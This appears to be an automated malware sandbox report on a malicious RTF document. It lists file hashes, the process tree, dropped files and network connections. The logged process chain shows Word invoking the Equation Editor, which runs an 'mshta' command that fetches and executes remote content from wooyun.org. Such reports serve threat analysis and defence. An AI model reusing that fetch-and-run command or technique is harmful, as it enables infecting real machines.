| Field | Value |
|---|---|
| File name | f45dafd3e0a08a243eab4202c3797140.rtf |
| Full analysis | https://app.any.run/tasks/63ac6d09-8e23-4b6e-9db8-19cb2a779701 |
| Verdict | Malicious activity |
| Analysis date | May 24, 2019, 02:56:10 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | text/rtf |
| File info | Rich Text Format data, version 1, ANSI |
| MD5 | F45DAFD3E0A08A243EAB4202C3797140 |
| SHA1 | 1177E06DD5392DA2BD3AA8CEB8368CAE35FE967D |
| SHA256 | F8C7F9AE9D4470CB4F495D0BACA4E5D928AC50816412D7E3A71AC5DECB2C0241 |
| SSDEEP | 48:Mp54iWuutGfEjNMtvbDSj3xMa27983O+G+phyD9LhQQQzQUAUxNhHb11gb90RCZZ:MwuUG5VoWx2YKyRFVS1E9fNDHy4h/1N/ |
| File type detection | .rtf: Rich Text Format (100) |

| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Version | Exit code |
|---|---|---|---|---|---|---|---|---|---|---|
| 3324 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f45dafd3e0a08a243eab4202c3797140.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 | |
| 2872 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe | admin | Design Science, Inc. | MEDIUM | Microsoft Equation Editor | 00110900 | 0 |
| 896 | mshta http://wooyun.org/1.txt | C:\Windows\system32\mshta.exe | | EQNEDT32.EXE | admin | Microsoft Corporation | MEDIUM | Microsoft (R) HTML Application host | 8.00.7600.16385 (win7_rtm.090713-1255) | |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3324 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFA1C.tmp.cvr | — | — | — |
| 3324 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | B4A3A7010D8FEA8F141CA79DBF1C0A7F | 1AE5A8F017BE4D661214AD5059D36CCC00CE7BC44428DA72655DCE7695B6AB06 |
| 896 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\notice[1].png | image | B9A4DCD8C2F300CD737E55CA9AB811B6 | 554E7D779EC74F1281809F73A32ACDDBA174F9C947ADC6EDCBBCB5B51AB21F8D |
| 3324 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$5dafd3e0a08a243eab4202c3797140.rtf | pgc | E54B28D6DBBF1E71F999DF2C0EE60C1D | F1DAD4CF7CF3BEF518B468C9FD72123234B72D103BCB49ED8F1FA387A3C60EE6 |
| 896 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1[1].htm | html | E0ACFEB017FBB4DB7548014B98D08D88 | 60EDC82849578DAC87A6CEFD62E1E34A208DFA6E677606AA1D785427073A299D |
| 3324 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BDA9440.wmf | wmf | 975B76E8E77D57CC386AF977A08B1E31 | 8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD |

| PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 896 | mshta.exe | GET | 200 | 162.243.9.231:80 | http://wooyun.org/1.txt | US | html | 218 b | unknown |
| 896 | mshta.exe | GET | 200 | 162.243.9.231:80 | http://www.wooyun.org/notice.png | US | image | 37.8 Kb | unknown |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 896 | mshta.exe | 162.243.9.231:80 | wooyun.org | Digital Ocean, Inc. | US | unknown |

| Domain | IP | Reputation |
|---|---|---|
| wooyun.org | | unknown |
| www.wooyun.org | | unknown |